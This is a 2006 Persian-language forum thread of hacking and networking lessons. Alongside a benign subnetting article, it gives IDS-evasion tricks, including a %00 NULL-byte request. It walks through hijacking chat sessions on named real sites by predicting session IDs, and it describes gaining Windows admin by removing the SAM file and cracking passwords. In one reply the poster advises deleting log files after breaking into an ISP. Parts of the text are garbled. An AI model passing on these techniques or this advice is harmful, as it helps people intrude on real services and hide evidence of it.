Session Splicing:بر خلاف نه روش قبلي Session Splicing در سطح لايه TCP پياده سازي کرده ايد و تقاضا شما ابتدا تكه تكه شده و در بسته هاي جدا گانه يك تا سه كاركتري ارسال ميي شود بسياري از سيستمهاي IDS توانائي بازسازي قطعات را ندارند و براي اين بست ها مجوز صادر مي كند

NULL Method بسياري از سيستمهاي IDS براي تحليل رشته URL از توابع رشته اي استفاده مي كنند در بين رشته URL، كاركتر%00NULL Characterوجود داشته باشد توابع رشته اي آنرا بعنوان خاتمه رشته تلقي مي كنند وبدين نحو IDS گمراه مي شود در حاليكه URL اعتبار خود را از دست نخواهد داد اكثر سرورها وب از كاركتر %00 چشم پوشي مي كنند
GET%00/ cgi-bin /broken .cgi HTTP /1.0
مكانيزمهاي Whisker
ابزارWhisker براي گول زدن و فرار از IDS سعي کرده تا رشته ارسالي در قالب از متود GET كه به فرا خواني اسكريپ CGI کند به شكلي که اصل خود را از دست بدهد و منجر به تحريك سيستم IDS نشود و پروتكل HTTPرا تفسير صحيح و معتبر بدهد

pastoo
14-09-2006, 00:31
مطالبی از آموزش سیسکو و امنیت آن را در این پست می زارم .
مقاله تخصصی می باشد

زير شبكه
بطور كلي به شبكه اي گفته مي شود كه بخشي از يك شبكه ي بزرگ تر تشكيل ميدهددر شبكه هاي ip يك
شبكه بزرگ را به شبكه هاي كوچك تر تقسيم مي كنند تا با استفاده ازدو روش فضاي نشاني ip
1-ترجمه نشاني شبكه
2-ترجمه نشاني درگاه
باعث بهبود كارايي امنيت و جبران كمبود نشاني هاي شبكه شوند
براي استفاده از اولين زير شبكه . بايد به مورد هاي توجه شود كه در اين مقاله
به ان ها اشاره مي شود.
تشريح اولين و اخرين زير شبكه صفر
زماني كه شبكه به چند شبكه كوچك تر تقسيم مي شود ان اولين زير شبكه را زير شبكه صفر است
مثال : 172.16.0.0
به طور پيش فرض اين رده داراي 16بيت ذخيره شده براي نمايش نشاني ميز بان است بنابراين
65534(2-2) نشاني قابل قبول وجود دارد حال فرض كنيد شبكه ي زير با قرض گرفتن 3بيت از
بيت هاي ميزبان .به هشت (2)شبكه كوچك تر تقسيم شود.
مثال: 172.16.0.0/19
پس زير شبكه ي صفر ناميده مي شود بايدتوجه کرد زيرا اولين شبكه پس از تقسيم شبكه به شبكه به عنوان زير شبكه صفر شناخت مي شود پس هيچ قاعده ي خاصي براي تعين زير شبكه ي صفر وجود ندارد
اكنون براي شناسايي اين زير شبكه مي توان نشاني ان را به پايه (2)برد
براي همين نيز به اين زير شبكه زيرشبكه صفر نام دارد به صورت که هر سه بيت 17و18و19 در زير شبكه ي صفر است
تشريح زير شبكه تمام يك
اخرين زير شبكه در مجموعه ي زير شبكه هايي كه ايجاد شده را زير شبكه ي تمام يك ناميده مي شود
چرا به خاطر يك بودن بيت هاي 17و18و19 است
شكل هاي زير شبكه صفر و زير شبكه تمام يك
نبايد از زير شبكه صفر و زير شبكه ي تمام يك به عنوان زير شبكه فيزيكي استفاده نشود ودر سندهاي RFC 950 ذخيره كردن و اختصاص داد
اين دو زير شبكه را نمي توان براي زير شبكه ي فيزيكي به كار گرفت وبراي نشاني هاي شبكه وداده پراكني بسيار مفيد استروش سنتي محاسبه ي زير شبكه
براي همين درشبكه ها تعداد زير شبكه هاي اين دو زير شبكه را در محاسبه هاي خودبه حساب نمي اورد يعني اگر سه بيت براي زير شبكه مورد استفاده قرار گيرد پس از محاسبه 8=2 عدد 2 ازان كم مي شود
اين روش روش سنتي محاسبه ي زير شبكه هاست
براي همين بود که قبلا استفاده از زير شبكه ي صفر كمتر بوده به كه دليل خاصيت ذاتي اين روش
نشاني دهي تميز نشاني شبكه و زير شبكه غير ممكن به نظر مي رسيد براي مثال نشاني زير را از مثال قبلي در نظر بگيريد:
مثال : 172.16.1.10
اکنون اگر بخواهيم نشاني زير شبكه ي ان را به دست اوريد خواهيد داشت مثال : 172.16.0.0 كه شما ان را به چند زير شبكه تقسيم كرده ايد بنابر اين هر گاه شما يك شبكه را به چند زير شبكه تثسيم كنيد زير شبكه اي خواهيد داشت كه نشاني ان با نشاني شبكه ي اصلي تفاوتي ندارد .اين مسئله اغلب منشا اشتباه هاي بزرگي خواهد داشت
زير شبكه ي تمام يك نيز مانند همتاي خود زير شبكه ي صفر .به دليل ويژگي ذاتي ايكه دارد شناسايي نشاني داده پراكني شبكه ي صفر .به دلليل ويژگي ذاتي اي كه دارد شناسايي نشاني داده پراكني شبكه ي اصلي و اين زير شبكه را دشوار مي كند .براي مثال .در مثال قبلي .نشاني اخرين زير شبكه يا زير شبكه ي تمام يك ها عبارت است از : 172.16.224.0/19
نشاني داده پراكني اين زير شبكه عبارت است :172.16.255.255
كه برابر با نشاني داده پراكني شبكه ي اصلي .به صورت زير است :.172.16.0.0
بنابراين هر گاه زير شبكه اي درست كنيد .شبكه اي خواهيد داشت كه نشاني داده پراكني ان با نشاني داده پراكني شبكه ي اصلي يكي است .به عبارت ديگر اگر مهندس شبكه .نشاني زير را به مسيرياب 15 خود اختصاص دهد : 172.16.230.1/19
هيچ تفاوتي بين نشاني داده پراكني زير شبكه اي كه مسير ياب در ان وجود دارد16.ونشاني داده پراكني شبكه ي اصلي 17وجود نخواهد داشت
درحال حاضر .از زير شبكه هاي تمام يك .استفاده مي شود .بنابراين پيكربندي نادرست ان.
مي تواند مشكل هاي جدي به وجود اورد .
در اين مثال مسير ياب هاي 2تا5 هر كدام به عنوان مسير ياب هاي دسترسي انجام وظيفه
مي كنند. براي همين تعدادي خط ورودي غير همزمان يا (اي اس دي ان)دارند در اين مثال يك
شبكه ي رده ي (سي) به چهار شبكه تقسيم شده است و به هر يك از ان ها نيز يك مسير ياب
براي دسترسي اختصاص داده شده است
علاوه بر اين خط هاي غير همزمان هر يك از مسير ياب ها به صورت زير پيكر بندي شده اند:
ip unnum e0
مسيرياب (1)براي دسترسي درست داراي مسير هاي ايستا است كه هر كدام از ان ها به يكي از
مسيرياب هاي دسترسي اشاره مي كنند به همين ترتيب هر يك از مسير ياب هاي دسترسي توسط
يك مسير پيش گزيده به مسيرياب (1)اشاره مي كنند
جدول مسير يابي مسيرياب (1)مشابه جدول زير است:
مسيريابي مسيرياب (1)
c 195.1.2.0/24 E0
S 195.1.1.0/26 195.1.2.2
S195.1.1.64/26 195.1.2.3
S 195.1.1.128/26 195.1.2.4
S 195.1.1.19/26 195.1.2.5
مسيرياب هاي دسترسي نيز داراي پيكر بندي مشابهي هستند يعني ان ها نيز داراي مسير هاي پيش گزيده تعدادي مسير ميزبان براي خط هاي غير هم زمان در پيمان نقطه به نقطه هستند.
جدول مسير يابي ساير مسير ياب ها عبارت اند از :
مسير يابي مسير ياب (2)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.2/32async 1
C 195.1.1.5/32 async 2
C 195.1.1.8/32 async 3
C 195.1.1.13/32 async 4
C 195.1.1.24/32 async 6
C 195.1.1.31/32 async 8
C 195.1.1.32/32 async 12
C 195.1.1.32/32 async 12
C 195.1.1.62/32 async 18
مسير يابي مسير ياب(3)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.65/32 async 1
C 195.1.1.68/32 async 2
C 195.1.1.74/32 async 3
C 195.1.1.87/32 async 4
C 195.1.1.88/32 async 6
C 195.1.1.95/32 async 8
C 195.1.1.104/32 async 12
C 195.1.1.112/32 async 15
C 195.1.1.126/32 async 18
مسير يابي مسير ياب) 4)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.129/32 async 1
C 195.1.1.132/32 async 2
C 195.1.1.136/32 async 3
C 195.1.1.141/32 async 4
C 195.1.1.152/32 async 6
C 195.1.1.159/32 async 8
C 195.1.1.160/32 async 12
C 195.1.1.176/32 async 15
C 195.1.1.190/32 async 18
مسير يابي مسير ياب)5)
C 195.1.2.0/24 E0
S 0.0.0.0/0 195.1.2.1
C 195.1.1.193/32 async 1
C 195.1.1.197/32 async 2
C 195.1.1.200/32 async 3
C 195.1.1.205/32 async 4
C 195.1.1.216/32 async 6
C 195.1.1.223/32 async 8
C 195.1.1.224/32 async 12
C 195.1.1.240/32 async 15
C 195.1.1.252/32 async 18

چه پيش خواهد امد اگر ميزباني كه از طريق خط غير هم زمان به شبكه وصل شده است.
به جاي نشاني الگوي زير شبكه 255.255.255.192
از نشاني الگو ي اشتباه زير استفاده كند:
225.255.255.0
در جواب بايد گفت :(همه چيز به خوبي كار مي كند)
حال ميزبان زير را در نظر بگيريد :
195.1.1.24
اين ميزبان مي خواهد پيام داده پراكني اي ارسال كند. به عبارت زير در بسته اي باويژگي هاي زير
ارسال مي كند:
S :195.1.1.24 d :195.1.1.255
اين بسته توسط مسير ياب (2)دريافت مي شود .مسيرياب (2)ان را به مسير ياب (1)،و سپس به مسير ياب (5)مي دهد .اين عمل ان قدر تكرار مي شود تا بسته به انتهاي عمرخودبرسد.
در اين حالت ممكن است تصور كنيد به شبكه ي شما حمله شده است در حالي كه اشكال در درون
خود شبكه به وجودامده است.
در اين مثال.از يك حلقه ي مسير يابي استفاده شد كه وجود ان در شبكه معمو لا به عنوان اشكال
مطرح مي شود.
مسيرياب (5)كه مسير يابي زير شبكه ي تمام يك را به عهده دارد تمام رفت وامد ايجاد شده توسط
اين اشكال را تحمل مي كند مسير ياب هاي 2 تا4. فقط يك بار بسته هاي داده پراكني را دريافت مي كنند مسيرياب (1)هم فشار رفت و امد زيادي را تحمل مي كند اما اگر اين مسيرياب از گونه ي
(سيسكو7513)باشد چگونه اين وضعيت را تحمل مي كند در اين حالت بايد نشاني ميزبان هارابا الگوي درست نشان دهيد.
براي جلوگيري از كار نادرست ميزبان هايي كه به درستي تنظيم نشده اند.مي توان از رابط حلقه
باز گشت براي هر مسير ياب دسترسي استفاده كرد ويك مسير ايستا براي نشاني زير درست كنيد:
195.1.1.255
هم چنين مي توانيد از رابط زير استفاده كنيد:
Nu110
اما انجام اين كار باعث ميشود مسيرياب (پيام پيمان نظارتي انترنت )را. به صورت زير در معناي عدم دسترسي به شبكه نمايش دهد :
unreachable

كاربردزير شبكه هاي صفرو تمام يك
باوجود غير تعارف بودن استفاده از اين دو مجموعه نشاني . كل فضاي نشاني دهي به همراه اين دو نشاني همواره قابل استفاده است استفاده از زير شبكه ي تمام يك. از قبل مجاز بود.
در حالي كه استفاده از زير شبكه صفر از زمان معرفي(سيسكو اي ا اس 12)شروع شد با اين وجود قبل از ارايه ي(سيسكواي ا اس 12)اين زير شبكه با استفاده از فرمان زير در تنظيم هاي عمومي
مسير ياب هاي قابل استفاده بود :
ip subnet-zero
براي استفادهاز اين دو نشاني سندهاي (اراف سي 1878)امده است:
(حذف زيرشبكه ي صفروزير شبكه ي تمام يك ديگر منسوخ شده است:زيرا نرم افزار هاي جديد امروزي توانايي به كارگيري تمام شبكه هاتعريف شده را دارند )
امروز استفاده از زير شبكه ي صفر و زير شبكه تمام يك مجاز مي باشد وبيش تر توليدكنندگان اين ويژگي راپشتيباني ميكنند با اين وجود برخي شبكه هاي خاص هنوز از نرم افزارهاي قديمي استفاده مي كنندكه استفاده از زير شبكه صفر و زير شبكه ي تمام يك در ان ها مي تواند مشكل ساز باشد
*****

fbehnaz
14-09-2006, 02:33
پستو جان من پست 301 رو خوندم. شما در اون گفتيد ميشه شماره تلفن رو از حافظه Isp پاك كرد. چگونه ؟ لطفا توضيح دهيد.
از شما بابت آموزش مطالب حرفه اي متشكرم.

pastoo
14-09-2006, 10:19
پستو جان من پست 301 رو خوندم. شما در اون گفتيد ميشه شماره تلفن رو از حافظه Isp پاك كرد. چگونه ؟ لطفا توضيح دهيد.
از شما بابت آموزش مطالب حرفه اي متشكرم.


خوشحالم از توجه شما دوست عزیز
بابت پست 301 باید بگم آنجا من نحوه ورود به isp به منظور استفاده از اینترنت را عنوان کردم اما اگر بخواین که به isp نفوذ کنید که مطلب جداست که در این 300 پست چندین مرتبه نفوذ به شبکه توضیح داده شده .
فقط این مطلب را اضافه کنم که بعد از نفوذ باید به فایل های log دسترسی پیدا کنید و آن ها را پاک کنید .از پست شماره 189 و 190 استفاده کن

pastoo
15-09-2006, 22:30
در زمانهاي گذشته سرقتهاي بانكي توسط دزدان حرفه اي و با تجربه اي انجام مي شد كه سالهاي عمر خود را در اين راه گذرانده اند و به قول معروف پير اين راه شده اند ولي امروزه دزدي از بانكها توسط افراد زير 18 سالي انجام مي شود كه فقط يك ارتباط تلفني با اينترنت دارند.

براي فهميدن اين خطر سناريو هاي زير را بخوانيد :
سناريو اول :
مايكل كه يك كارمند ساده مي باشد ( كاربر مشروع) براي بررسي حساب بانكي خود(پايگاه داده ) به بانك محلي خود(سرور وب بانك ) مي رود و توسط تحويلدار آن (برنامه كاربردي وب ) كارش را انجام داده و بر مي گردد.

سناريو دوم:
ادوارد (كاربر نامشروع) به همان بانك محلي رفته و از در جلو وارد مي شود(پورت 80 ) و خودش را شبيه هر مشتري كه مي خواهد مي كند !
او حتي به اين فكر مي كند كه براي سرقت بانك لازم نيست كه از درهاي ديگر وارد شود (پورتهاي ديگر ) بنابراين از نظر نگهبان جلو در (ديواره آتش) او فرد بي خطري مي باشد. او توسط تحويل دار ديگري (برنامه كاربردي وب) سرويس دهي مي شود در حاليكه او به دروغ خود را مايكل معرفي كرده است و تحويل دار نيز اين را باور كرده است(مديريت نشست ها (Session Management )) كه او ادوارد نيست و مايكل مي باشد. بنابراين به او اجازه مي دهد كه به حساب بانكي مايكل دسترسي داشته باشد.

سناريو دوم يك حمله واقعي جعل هويت را شرح مي دهد كه توسط نگهبان امنيتي (ديواره آتش) نيز قابل شناسايي نمي باشد.
ازدياد تجارتخانه هاي الكترونيكي و يا هر چيز ديگري كه توسط اينترنت انجام مي شود باعث شده است حملات به آنها از دنياي واقعي به دنياي مجازي نفوذگران تغيير مكان دهد.
نتيجه چنين حملات جعل هويتي در برنامه هاي كاربردي وب ( كه در دنياي نفوذگران به حملات جعل هويت[2] (http://www.websecuritymgz.com/n1/newsaddhtml.asp#_ftn2) معروف است ) باعث آشكار شدن اطلاعات و هويت افراد و پس از آن دستبرد و دزدي سرمايه هاي آنها در وب مي باشد.
به علت ضعف ديواره هاي آتش در تشخيص چنين حملاتي باعث شده است كه اينگونه حملات مورد توجه بسياري از نفوذگران كلاه سياه قرار گيرد و باعث دغدغه خاطر و نگراني بسياري از مديران سايت ها و برنامه نويسان تحت وب قرار گرفته است.
در اين مقاله قصد بر آن است كه توضيح بسيار مختصري درباره اين نوع حمله داده شود و توسط مثالهايي كه زده مي شود فهم اين مطلب را براي بسياري از دوستان راحت كنيم. هر چند براي فهم بهتر اين مطلب بايد آشنايي تقريبي با تكنيكها مديريت نشست ها داشته باشيد. در پايان نيز راههاي مقابله با اين گونه حملات بيان شده است كه اميد است مورد توجه مديران و برنامه نويسان سايتها قرار گيرد.

مديريت نشستها
مديرست نشستها شامل تكنيكهايي مي باشد كه به وسيله برنامه هاي كاربردي وب به كار مي رود تا براي هر درخواست Http اي كه كاربران مي فرستند هر باره LOGIN نكنند و كسب مجوز لازم براي حق دسترسي به آن درخواست داده شود. مسووليت مديريت اين كار توسط خود برنامه كاربردي وب مي باشد. به همين وسيله مي باشد كه پروتكل Http از حالت Stateless به حالت Statefull درآيد.مديريت نشست ها به اين صورت مي باشد كه برنامه كاربردي وب پس از دادن كسب مجوز لازم براي كاربر يك نشانه نشست براي او ارسال مي كند. در بيشتر مواقع اين نشانه توسط مجموعه كوكيها تنظيم مي گردد كه در سيستم مشتري ذخيره مي شود. اين نشانه هاي نشست با هر درخواستي كه كاربر دارد ارسال مي گردد تا برنامه كاربردي وب بر طبق آن هويت شما را تشخيص دهد.

مثال ساده :
وقتي در سايت www.iranianchat.com (http://www.iranianchat.com/) وارد مي شويد و مي خواهيد وارد اتاق گفتگو شويد هنگامي كه يك اسم را انتخاب مي كنيد و وارد اتاق مي شويد برنامه كاربردي يك نشانه نشست(chatID ) به شما مي دهد كه در متن صفحه اتاق گفتگو نهفته است و وقتي كه شما پيغامي را براي دوستتان مي فرستيد پيغام شما به همراه اين نشانه براي برنامه كاربردي ارسال شده و متن فرستاده شده از طرف شما روي صفحه ظاهر مي گردد.يعني به صورت زير:


http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3087.2&PostMsg=Hello (http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3087.2&PostMsg=Hello)

و از همين طريق مي باشد كه برنامه كاربردي تشخيص مي دهد كه كدام كاربر كسب مجوز دارد و كدام ندارد در مثال بالا يعني كاربري كه پيام خود را ارسال مي كند آيا قبلا اسمي براي خود انتخاب كرده است يا خير !
مكانيسمهاي مديريت نشستها را در دو دسته مي توان گنجاند : مكانيسمهاي سمت مشتري و مكانيسمهاي سمت سرور . اين دسته بندي بر اساس محتواي نشانه هاي نشست هايي است كه بين مشتري و برنامه هاي كاربردي رد و بدل مي شود.

مديريت نشستهاي سمت كاربر
در اين نوع از مديريت نشستها ، نشانه توكن شامل ضروري ترين بخش براي دادن كسب مجوز به كاربران مي باشد.بنابراين اين بخش از اطلاعات كسب مجوز در سمت مشتري خيره مي شود كه اغلب اين كار توسط كوكيها در سمت مشتري انجام مي گردد. حال اگر كسي اين نشانه را طوري ماهرانه تغيير دهد تا شبيه نشانه فرد ديگري شود آنگاه برنامه كاربردي اينگونه فكر مي كند كه اين شخص همان شخص است.

مديريت نشستهاي سمت سرور
يك اختلاف اساسي بين اين نوع از مديريت با نوع قبلي وجود دارد و آن اين است كه در اين نوع مديريت اطلاعات كاربران در بانك اطلاعاتي سرور ذخيره مي شود و در كوكيها هيچ اطلاعاتي ذخيره نمي گردد. ولي در اينجا نيز نشانه نشست (Token Session ) بين سرور و كاربر رد و بدل مي شود. به عنوان مثال وقتي وارد سايت xyzbank.com مي شويد و پس از اينكه كسب مجوز لازم براي ورود به سايت را دريافت كرديد يك sessioniID به شما تعلق مي گيرد كه اين نشانه شما مي باشد.


Amiri :
http://www.xyzbank.com/showbil.asp?sessionID=1027 (http://www.xyzbank.com/showbil.asp?sessionID=1027)
Alizade:
http://www.xyzbank.com/showbil.asp?sessionID=1028 (http://www.xyzbank.com/showbil.asp?sessionID=1028)

اين نشانه هاي مي تواند در بانك اطلاعاتي سمت سرور به صورت زير ذخيره گردد: aaa




Account Number

Admin

Username

Index

….

….

….

….

All

Y

Hosseini

1025

087

N

Madadi

1026

545

N

Amiri

1027

784

N

Alizade

1028

452

N

Sharifi

1029
….
….
….
….


براي اينكه آقاي اميري بخواهد خودش را جاي آقاي عليزاده بزند كافي است كه SessionID خودش را به SessionID آقاي عليزاده تغيير دهد يعني لينك زير را ارسال كند:


http://www.xyzbank.com/showbil.asp?sessionID=1028 (http://www.xyzbank.com/showbil.asp?sessionID=1028)

باز هم مي بينيم كه طلاعات ذخيره شده در سمت سرور هم نمي تواند ما را در برابر جعل هويت مصون كند.
در قسمت اول دلايل استفاده از نشست ها و همچنين دسته بندي از آنها بيان كرديم. در اين مقاله يك مثال عملي آورده ايم و نحوه مقابله با اينگونه حملات نيز بيان شده است.
يك مثال واقعي
حتما خيلي از شما تا به حال به سايت www.iranianchat.com (http://www.iranianchat.com/) رفته ايد وقتي وارد اتاق گفتگو مي شويد برنامه كاربردي سايت يك chatID به شما مي دهد و هر بار كه شما پيغامي ارسال مي كنيد پيغام شما به همراه يان chatID كه نمايانگر شما مي باشد براي برنامه كاربردي ارسال مي گردد و اين برنامه از طرف شما اطلاعات زير را ذخيره كرده است :
chatID = 3087.2
Name = "Kalantar"
Color = "#b2b2b2
Msg = Your Message
حال وقتي پيغامي به همراه ChatID شما براي برنامه كاربردي سايت ارسال مي شود اين برنامه اين پيغام را از طرف شما و با نام شما در اتاق گفتگو مي نويسد.
حال وقتي يك نگاه ساده به ChatID هاي داده شده توسط برنامه كاربردي وب بياندازيم مي بينيم كه آنها شباهتي با هم دارند و روي يك الگوريتم خاصي به كاربران داده مي شود:

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3087.2
k1 omad 5/9/2004 12:51:27 AM (213.17.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3091.507
k2 omad 5/9/2004 12:51:31 AM (213.17.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3095.512
k3 omad 5/9/2004 12:51:35 AM (213.7.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3107.239
k4 omad 5/9/2004 12:51:47 AM (213.7.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3111.235
k5 omad 5/9/2004 12:51:51 AM (213.17.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3116.242
k6 omad 5/9/2004 12:51:56 AM (213.17.8.4)

با جمع آوري اعداد و ارقام به دست آمده و آمارگيري آنها الگوريتم به كار رفته براي ساختن نشانه نشست به دست مي آيد:

12:51:31 - 12:51:27 = 00:00:04 ==> 3091-3087 = 4
12:51:35 - 12:51:31 = 00:00:04 ==> 3095 - 3091= 4
12:51:47 - 12:51:35 = 00:00:12 ==> 3107 - 3095= 12

الگوريتمي كه برنامه نويس سايت (RoyaAz ) براي مديريت نشست ها به كار برده است به صورت زير مي باشد:

ChatID = Num1.Num2
OldNum1 = Num1 براي آخرين نفر
Num1 = (زمان ورود آخرين نفر – زمان ورود شخص ) OldNum1
Num2 = يك عدد تصادفي بين 0 تا 999

به عنوان مثال عملي تر ، فرض كنيد پس از نفر K6 آقاي X وارد مي شود كه اطلاعات آن به صورت زير مي باشد :
............................................................ ...........
k6 omad 5/9/2004 12:51:56 AM (213.17.8.4)
K6 : Salammmmm
K6 :
X omad 5/9/2004 12:52:16 AM (10.7.28.157)
X : Hi !
X: Salam K6
............................................................ ............

در اين هنگام K6 نگاهي به ChatID خود مي كند و نگاهي به زماني كه وارد شده است. اطلاعات آن به صورت زير مي باشد :

ChatID = 3116.242
Time = 12:51:56

و از زماني كه آقاي X وارد شده اند ( 12:52:16 ) مي تواند به راحتي قسمت اول نشست را پيدا كند يعني ChatID آقاي X به صورت زير مي باشد :

12:51:56 - 12:52:16 = 20
ChatID = 3116 20 = 3136

pastoo
15-09-2006, 22:33
چارچوب عمومي حملات
اولين سوالي كه با آن روبه رو مي شويم اين است كه براساس سيستم عامل هاي موجود حملات چگونه چارچوب بندي مي شود.
به بيان ديگر شماي كلي حملات مبتني بر سيستم عامل چگونه تقسيم بندي مي شود؟ در جواب بايد 2 چارچوب متفاوت را تعريف كرد.
يك چارچوب براساس سيستم عامل ويندوز - مايكروسافت مي تواند شامل ويندوز 98 ، Me ، 2000 ، ايكس پي و ان تي باشد - است و چارچوب بعدي سيستم عامل هاي اوپن سورس شامل لينوكس ، OpenBSD ، ترينوكس و برخي سيستم هاي يونيكس با درجه اهميت پايين تر است.
چارچوب عمومي حملات سيستم عامل ويندوز ، سيستم عامل هاي مبتني بر اوپن سورس شامل 98 ، Me ، 2000 ، ايكس پي و ان تي شامل لينوكس ، OpenBSD ، ترينوكس و برخي سيستم هاي يونيكس سطح پايين تر است.

حملات محلي و از راه دور
نكته بعدي اين است كه حملات از نظر موقعيت مكاني حمله كننده به چند دسته تقسيم مي شود بر اين اساس يك حمله محلي يا Local داريم و يك حمله از راه دور يا Remote در نفوذ محلي حمله كننده با دسترسي فيزيكي به سيستم مي تواند كار خود را پيش ببرد.
بدين معني كه بتواند پشت ماشين قرباني نشسته و شروع به حمله كند.
بنابراين حمله محلي از نظر موقعيتي در همان محلي كه سيستم قرباني قرار دارد ، دسته بندي مي شود.
اما حمله از راه دور برعكس بالا ، به گونه اي است كه حملات روي شبكه ها يا سيستم هاي قرباني به طريقه راه دور پيش مي رود - در محيط شبكه اگر شما بخواهيد به سيستم بغل دستتان (و نه سيستمي كه پشت آن نشسته ايد) نفوذ كنيد اين نوع نفوذ از راه دور تعبير مي شود.
هركدام از نفوذهاي فيزيكي يا از راه دور نيز قلق ها و روشهاي خاص خود را دارد.

ماشين ورك استيشن (work station) همان ماشيني محسوب مي شود كه كاربر پشت آن نشسته و با آن كار مي كند.
اما دلايلي كه بايد نسبت به اين گونه حملات كه بعضا در بعضي مواقع دودمان يك سازمان را به باد مي دهد حساس باشيم ، به شرح زير است :
يكي اين كه دسترسي هكر به ورك استيشن متصل به شبكه بدين معناست كه وي مي تواند به راحتي به ليست كاربران ، اطلاعات دوباره سيستم ها و سرورها دسترسي نامحدود پيدا كند.
نكته بعدي اين كه هكرها مي توانند از طريق فيزيكي و نشستن پشت يك رايانه ساده ، ابتدا كلمه عبور آن را كشف كرده و وقتي وارد آن شدند دسترسي به سرورها را به راحتي آب خوردن براي خود فراهم نمايند.
نكته مهم تر اين كه اگر يك كاربر ساده از طريق ورك استيشن يك برنامه جاسوسي يا اسب تروا را نصب كند آن وقت تمامي اطلاعات حساس شبكه به يغما رفته بدون اين كه كسي متوجه شود.

انواع حملات محلي روي ورك استيشن
الف - عمومي ترين نوع حمله روي يك ماشين ورك استيشن به دست آوردن توانايي راهبري (Admin در ويندوز Root در سيستم هاي اوپن سورس مثل لينوكس) سيستم است.
معمولا در ويندوز ورك استيشن هكرها با تغييرنام (Rename) يا پاك كردن پوشه SAM در آدرس زير به راهبري ماشين دست مي يابند.
C:\ winnt\ system32\ config\ SAM
و در لينوكس با پرامت تحت Lilo و تايپ كلمه Linuxs مي توان به توانايي راهبري سيستم بعنوان يك هكر دسترسي يافت.
ب : راه ديگر شكستن كلمه عبور است كه معمولا با برنامه هاي پسوردشكن مثل Lophtcrack (LC) هكر موفق به انجام اين كار مي شود و در بوت مجدد سيستم به راهبري دسترسي مي يابد.
ج : نوع بعدي حمله روي ورك استيشن سرقت هارد ماشين و قراردادن آن روي يك رايانه ديگر در همان مجموعه يا جاي ديگر است كه به همين راحتي اجازه سرقت اطلاعات بدون نفوذ از راه دور را مي دهد.
معمولا سازمانهاي بزرگ كه ديتاهاي حساس را روي شبكه نگه نمي دارند هزينه زيادي براي حفظ امنيت فيزيكي ورك استيشن هاي خود مي كنند تا بند را آب ندهند.
د: آخرين نوع حمله روي ورك استيشن اجراي كامندها و دستورات خاص هنگام Login كردن به سيستم و يا سوء استخراج كردن فايل ها (Exploiting files) است تا بوسيله آن به سيستم از طريق فيزيكي دسترسي يافت.
يك راه بسيار حياتي اضافه كردن يك user يا اسم كاربري به سيستم از طريق دستورات اديت در رجيستري است كه بوسيله آن مي توان بدون داخل شدن به سيستم از طريق Regedit يك اسم كاربري در حد راهبر ساخت و وارد آن شد.
راه ديگر دسترسي به ليست برنامه هاي مشترك ميان كاربران در شاخه زير است:
c:\ Document and settings\ All users\ start menu\ programs\ startup

نفوذ در شبكه در 4گام
يك هكر برنامه اي 4مرحله اي را در نظر گرفته و روي آن كار مي كند كه شامل موارد زير است :

footprinting
scanning and enumerating
Researching
Exploiting

1- Footprinting : فوت پرينتينگ در علوم رايانه اي پردازش ديتاهاي انباشته شده در محيط شبكه خاص براي پيدا كردن راهي جهت دخالت و فضولي تعريف شده است.
فوت پرينتينگ مي تواند حفره هاي سيستم را آشكار كند تا به وسيله آن هكر به وسيله exploiting (سوءاستخراج) وارد شبكه شود.
بر اين اساس تعيين مكان و موضوع اينتروژن بر عهده فوت پرينتينگ است.
مثلا بيوگرافي خاص كاربران و دايركتوري كارمندان و برخي اطلاعات آنان كه روي محيط وب در شبكه ذخيره مي شود منبع خوبي است تا هكر به وسيله آن ديتاهاي مورد نظر را كسب كنند.
بنابراين جمع آوري اطلاعات اوليه به وسيله اين فاكتور انجام مي پذيرد.
حال اين كه از چه فناوري اينترنتي و شبكه اي استفاده شده و سدهاي امنيتي جلوي سيستم و سرورها چه نوع هستند نيز مي تواند براي هكر راهگشا باشد.
هكر با دادن دستور Whois اول شناسنامه سرور قرباني را بيرون مي كشد.
مي توان از بسياري از سايت هايي كه مشخصات سايت ها را ثبت كرده اند اين اطلاعات را كسب كرد و شماره آي پي ماشين ها را بيرون كشيد.
با همين روش مي توان صفحات مشخص كاربران و شماره تلفن آنها را ديد و حتي با يك كامند روي كدهاي HTML نوشته شده براي حمايت به شبكه وارد شد.
گفتني است روش موسوم به Socialengineering به عنوان يكي از متدهاي نفوذ در شبكه در زير مجموعه فوت پرينتينگ به شمار مي آيد.
مثلا يك هكر در لباس دوست برايتان ايميل مي زند و داخل ايميل از شما اطلاعاتي مي گيرد كه نبايد آن را بدهيد.
حتي با شما دوست مي شود و به شبكه شما نيز مي آيد بدون آن كه متوجه شويد.
اين روش بعضي مواقع راهبران را گول زده و باعث مي شود خودشان با دست خودشان شبكه شان را به باد دهند.
در ضمن Ping كردن و دستورات رسيدن به آدرسهاي اينترنتي از طريق برودكست نيز جزو فوت پرينتينگ است

mohammad.gh
16-09-2006, 21:53
چه طورمي توان پسورد يك كامپيوتر را فهميد؟

black_demented
16-09-2006, 22:22
چطوری می تونم یه پورت آزاد داشته باشم ؟
برای مثال وقتی از برنامه µTorrent استفاده می کنم. پیغام می ده که پورتی که استفاده می کنید توسط فایروال مسدوده و به همین علت سرعت دانلود خیلی کمه در صورتی که من در فایوال برنامه رو آزاد کردم ولی نمی دونم چطوری می شه پورت رو آزاد کرد. یه برنامه هم هست به نام PFConfig که کار PortForward رو انجام می ده ولی به اولا کرک نشده دوما خیلی پیچیده بود. اگه راهنمایی کنید ممنون می شم
و در آخر یک سوال شما خودتون آزاد به این اطلاعات رسیدید یا در یکی از رشته های MCSE و یا Cisco درس خونیدین ؟؟؟ (که اگه درسش رو خوندین یه تاپیک درباره آموزش این دروس باز کنید)

pastoo
18-09-2006, 11:16
چطوری می تونم یه پورت آزاد داشته باشم ؟
